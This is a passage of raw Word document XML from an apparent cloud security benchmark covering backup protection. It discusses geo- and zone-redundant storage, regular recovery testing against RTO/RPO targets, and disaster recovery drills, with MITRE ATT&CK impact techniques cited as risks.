      <w:r w:rsidRPr="00D05157">
        <w:t>administrator</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D05157">
        <w:t xml:space="preserve"> from weakening backup protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A68A51" w14:textId="6636A3FB" w:rsidR="00D05157" w:rsidRDefault="00D05157">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05157">
        <w:t>Monitor immutability status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3362F324" w14:textId="1F35069A" w:rsidR="00D05157" w:rsidRPr="00D05157" w:rsidRDefault="00D05157">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="329"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05157">
        <w:t>Track immutability configuration across Recovery Services vaults alerting on attempts to disable protection or reduce retention periods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BD4E4E" w14:textId="77777777" w:rsidR="00AA1FA6" w:rsidRDefault="00AA1FA6" w:rsidP="00AA1FA6"/>
    <w:p w14:paraId="6AE3F2C5" w14:textId="7F51E105" w:rsidR="00AA1FA6" w:rsidRDefault="00014A68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="328"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00014A68">
        <w:lastRenderedPageBreak/>
        <w:t>Geographic redundancy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D63BDB" w14:textId="73B9F1B9" w:rsidR="00014A68" w:rsidRDefault="00014A68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00014A68">
        <w:t xml:space="preserve">Enable cross-region </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00014A68">
        <w:t>restore</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="77AD9770" w14:textId="013CF4EB" w:rsidR="00014A68" w:rsidRDefault="00014A68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="330"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00014A68">
        <w:t>Configure geo-redundant storage (GRS) for Recovery Services vaults automatically replicating backup data to Azure paired regions enabling recovery during regional disasters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E92DE06" w14:textId="2D838021" w:rsidR="00014A68" w:rsidRDefault="00014A68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00014A68">
        <w:t>Implement zone-redundant storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EFB36E" w14:textId="49D329D6" w:rsidR="00014A68" w:rsidRDefault="00014A68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="330"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00014A68">
        <w:t>Enable zone-redundant storage (ZRS) for Recovery Services vaults protecting backup data from datacenter-level failures within regions supporting availability zones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1841577C" w14:textId="74D25E20" w:rsidR="00014A68" w:rsidRDefault="00014A68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00014A68">
        <w:t>Test cross-region recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B57D1CE" w14:textId="49E09473" w:rsidR="00014A68" w:rsidRDefault="00014A68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="330"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00014A68">
        <w:t xml:space="preserve">Periodically validate cross-region restore capability ensuring backup data availability and restore </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00014A68">
        <w:t>procedures</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00014A68">
        <w:t xml:space="preserve"> work correctly in disaster scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24726EF9" w14:textId="47C8E03C" w:rsidR="00014A68" w:rsidRDefault="00014A68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00014A68">
        <w:t>Document failover procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB732A4" w14:textId="4EDAF577" w:rsidR="00014A68" w:rsidRDefault="00014A68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="330"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00014A68">
        <w:t xml:space="preserve">Maintain documented procedures for cross-region </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00014A68">
        <w:t>restore</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00014A68">
        <w:t xml:space="preserve"> including authentication, permissions, and recovery steps ensuring business continuity during regional outages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FC19F8" w14:textId="3D798A31" w:rsidR="00323B87" w:rsidRDefault="00323B87" w:rsidP="00323B87">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="_Toc242449578"/>
      <w:r w:rsidRPr="00323B87">
        <w:t>Recovery readiness</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w14:paraId="62BDB287" w14:textId="70C52515" w:rsidR="00323B87" w:rsidRDefault="00323B87" w:rsidP="00323B87">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc242449579"/>
      <w:r w:rsidRPr="00323B87">
        <w:t>BR-4: Regularly test backup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w14:paraId="038B7A4E" w14:textId="0C97C33D" w:rsidR="00323B87" w:rsidRDefault="00323B87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="331"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00323B87">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD56C9D" w14:textId="6FAF4E71" w:rsidR="00323B87" w:rsidRDefault="00323B87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00323B87">
        <w:t>Periodically validate backup configurations and recovery procedures through structured testing ensuring backup data integrity and recovery capability meet defined Recovery Time Objectives (RTO) and Recovery Point Objectives (RPO). Test recovery procedures at appropriate frequency balancing operational impact with recovery confidence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310495E7" w14:textId="7FDC5230" w:rsidR="00323B87" w:rsidRDefault="00323B87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="331"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00323B87">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00323B87">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2AC91A04" w14:textId="20218EDA" w:rsidR="00323B87" w:rsidRDefault="00323B87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00323B87">
        <w:t>Incomplete backup configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D42086D" w14:textId="42FAFBD7" w:rsidR="00323B87" w:rsidRDefault="00323B87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="332"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00323B87">
        <w:t>Backup jobs complete successfully but capture incomplete data sets missing critical components discovered only during recovery attempts causing extended downtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C7B1D6" w14:textId="77777777" w:rsidR="00323B87" w:rsidRDefault="00323B87" w:rsidP="00323B87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2012A636" w14:textId="50874521" w:rsidR="00323B87" w:rsidRDefault="00323B87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00323B87">
        <w:t>Recovery procedure failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A19299A" w14:textId="2496BE43" w:rsidR="00323B87" w:rsidRDefault="00323B87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="332"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00323B87">
        <w:t>Documented recovery procedures contain errors, missing steps, or incorrect commands failing during high-pressure disaster scenarios when mistakes are costly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAD5D1D" w14:textId="0D769487" w:rsidR="00323B87" w:rsidRDefault="00323B87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00323B87">
        <w:t>RTO/RPO violations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EE7149" w14:textId="7226A2DB" w:rsidR="00323B87" w:rsidRDefault="00323B87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="332"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00323B87">
        <w:t>Actual recovery time significantly exceeds defined objectives due to unexpected complications, infrastructure limitations, or procedural inefficiencies discovered during testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C1CC3F" w14:textId="785DEE91" w:rsidR="00323B87" w:rsidRDefault="00323B87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00323B87">
        <w:t>Corrupted backup data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAA1062" w14:textId="590F3CCE" w:rsidR="00323B87" w:rsidRDefault="00323B87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="332"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00323B87">
        <w:t>Backup data contains corruption, inconsistencies, or errors rendering recovery impossible despite successful backup job completion and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B4915A" w14:textId="4EB3EC5C" w:rsidR="00323B87" w:rsidRDefault="00323B87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00323B87">
        <w:t>Skills and knowledge gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACFD206" w14:textId="17E0444F" w:rsidR="00323B87" w:rsidRDefault="00323B87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="332"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00323B87">
        <w:t>Staff lack practical recovery experience leading to errors, delays, and poor decisions during actual disaster recovery when expertise is critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F9B390" w14:textId="205B3CA9" w:rsidR="00323B87" w:rsidRDefault="00323B87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00323B87">
        <w:t>Dependency identification failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23634B9A" w14:textId="3DBAA646" w:rsidR="00323B87" w:rsidRDefault="00323B87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="332"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00323B87">
        <w:t xml:space="preserve">Application dependencies and configuration requirements </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00323B87">
        <w:t>unknown</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00323B87">
        <w:t xml:space="preserve"> until recovery attempt causing cascading failures and extended recovery time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A4603F" w14:textId="77777777" w:rsidR="00EA6627" w:rsidRDefault="00EA6627" w:rsidP="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3960"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55FCFB51" w14:textId="35EAE8B4" w:rsidR="0058739E" w:rsidRDefault="0058739E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="331"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0058739E">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF06896" w14:textId="5B3E324C" w:rsidR="0058739E" w:rsidRDefault="0058739E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0058739E">
        <w:t>Impact (TA0040)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318AB544" w14:textId="6A4CCAF1" w:rsidR="00EA6627" w:rsidRDefault="00EA6627" w:rsidP="00EA6627">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA6627">
        <w:t>data destruction (T1485) and inhibit system recovery (T1490) causing maximum damage when untested backup configurations fail during recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40664386" w14:textId="192CE24A" w:rsidR="0058739E" w:rsidRDefault="0058739E" w:rsidP="0058739E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0058739E">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>BR-4.1: Implement backup recovery testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F317655" w14:textId="3890C658" w:rsidR="0058739E" w:rsidRDefault="0058739E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="333"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0058739E">
        <w:t>Validate backup effectiveness through structured recovery testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535859D5" w14:textId="43F29C95" w:rsidR="0058739E" w:rsidRDefault="0058739E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0058739E">
        <w:t>Establish structured backup recovery testing program validating data integrity, recovery procedures, and time objectives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A88F1F2" w14:textId="6016E0A6" w:rsidR="007D3D99" w:rsidRDefault="007D3D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="333"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3D99">
        <w:t>Recovery testing strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066572DE" w14:textId="4A86E4BF" w:rsidR="007D3D99" w:rsidRDefault="007D3D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3D99">
        <w:t>Define testing scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5859503B" w14:textId="4D41B754" w:rsidR="007D3D99" w:rsidRDefault="007D3D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="334"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3D99">
        <w:lastRenderedPageBreak/>
        <w:t>Establish recovery testing scope including full system recovery for Tier 1 applications, database recovery for Tier 2 applications, and file-level recovery for Tier 3 resources balancing thoroughness with operational impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D810CB0" w14:textId="0C814A7E" w:rsidR="007D3D99" w:rsidRDefault="007D3D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3D99">
        <w:t>Schedule regular tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214B5E7E" w14:textId="0D89DE8D" w:rsidR="007D3D99" w:rsidRDefault="007D3D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="334"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3D99">
        <w:t>Conduct recovery tests quarterly for critical systems, semi-annually for standard systems, and annually for less critical systems ensuring regular validation without excessive operational burden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0898F07F" w14:textId="0DD3A259" w:rsidR="007D3D99" w:rsidRDefault="007D3D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3D99">
        <w:t>Test different recovery scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A257D93" w14:textId="674B0683" w:rsidR="007D3D99" w:rsidRDefault="007D3D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="334"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3D99">
        <w:t>Validate multiple recovery scenarios including point-in-time restore, cross-region failover, individual file recovery, and complete system rebuild from backup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FA41B1" w14:textId="72C519D5" w:rsidR="007D3D99" w:rsidRDefault="007D3D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3D99">
        <w:t>Document test results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3C0084" w14:textId="57BE8E33" w:rsidR="007D3D99" w:rsidRDefault="007D3D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="334"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3D99">
        <w:t>Record recovery test outcomes including success status, actual recovery time, data validation results, and issues identified creating knowledge base for improvement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671EDCC6" w14:textId="3D4782A0" w:rsidR="007D3D99" w:rsidRDefault="007D3D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="333"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3D99">
        <w:t>Recovery procedure validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A7928A" w14:textId="6F4CBC45" w:rsidR="007D3D99" w:rsidRDefault="007D3D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3D99">
        <w:t>Restore to non-production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3819F94B" w14:textId="289EFB33" w:rsidR="007D3D99" w:rsidRDefault="007D3D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="335"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3D99">
        <w:t>Perform recovery tests in isolated non-production environments preventing production impact while validating backup integrity and recovery procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05546179" w14:textId="40CB6B9D" w:rsidR="007D3D99" w:rsidRDefault="007D3D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3D99">
        <w:t>Validate data integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4277ADBC" w14:textId="2822299B" w:rsidR="007D3D99" w:rsidRDefault="007D3D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="335"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3D99">
        <w:t>Verify restored data completeness and consistency including database integrity checks, file count validation, and application functionality testing confirming backup quality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224BAEDA" w14:textId="4E66A51C" w:rsidR="007D3D99" w:rsidRDefault="007D3D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3D99">
        <w:t>Measure recovery time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B019BA7" w14:textId="69B943D9" w:rsidR="007D3D99" w:rsidRDefault="007D3D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="335"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3D99">
        <w:t>Track actual recovery time for each test comparing against defined RTO requirements identifying procedure inefficiencies and infrastructure bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDAF29D" w14:textId="51618D2A" w:rsidR="007D3D99" w:rsidRDefault="007D3D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3D99">
        <w:t>Test recovery point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BDB08B" w14:textId="10012D72" w:rsidR="007D3D99" w:rsidRDefault="007D3D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="335"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3D99">
        <w:lastRenderedPageBreak/>
        <w:t>Validate backup capture point comparing restored data against expected state ensuring RPO requirements are met and no data loss occurs during recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244CE1C5" w14:textId="1BB1D0E9" w:rsidR="008870BC" w:rsidRDefault="008870BC" w:rsidP="008870BC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008870BC">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>BR-4.2: Validate disaster recovery capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430C60C7" w14:textId="41BC67B8" w:rsidR="008870BC" w:rsidRDefault="008870BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="336"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008870BC">
        <w:t>Validate organizational disaster preparedness through comprehensive exercises</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E70E74" w14:textId="585E1C40" w:rsidR="008870BC" w:rsidRDefault="008870BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008870BC">
        <w:t>Test end-to-end disaster recovery scenarios validating organizational readiness for major incidents requiring complete system recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3942BE" w14:textId="6378BA03" w:rsidR="008870BC" w:rsidRDefault="008870BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="336"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008870BC">
        <w:t>Disaster recovery testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B26892" w14:textId="186BCA9E" w:rsidR="00E13D85" w:rsidRDefault="00E13D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E13D85">
        <w:t>Conduct tabletop exercises</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550CB5AD" w14:textId="0F94FA6A" w:rsidR="00E13D85" w:rsidRDefault="00E13D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="337"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E13D85">
        <w:t>Perform tabletop disaster recovery exercises simulating various disaster scenarios validating team coordination, decision-making processes, and communication procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C6777A" w14:textId="1D6EE9A0" w:rsidR="00E13D85" w:rsidRDefault="00E13D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E13D85">
        <w:t>Execute failover drills</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F65052" w14:textId="2F897B32" w:rsidR="00E13D85" w:rsidRDefault="00E13D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="337"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E13D85">
        <w:t>Test cross-region failover capabilities activating backup infrastructure in secondary regions validating geo-redundancy effectiveness and recovery procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB4A960" w14:textId="3F92EF49" w:rsidR="00E13D85" w:rsidRDefault="00E13D85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E13D85">
        <w:t>Validate business continuity</w:t>
      </w:r>
    </w:p>
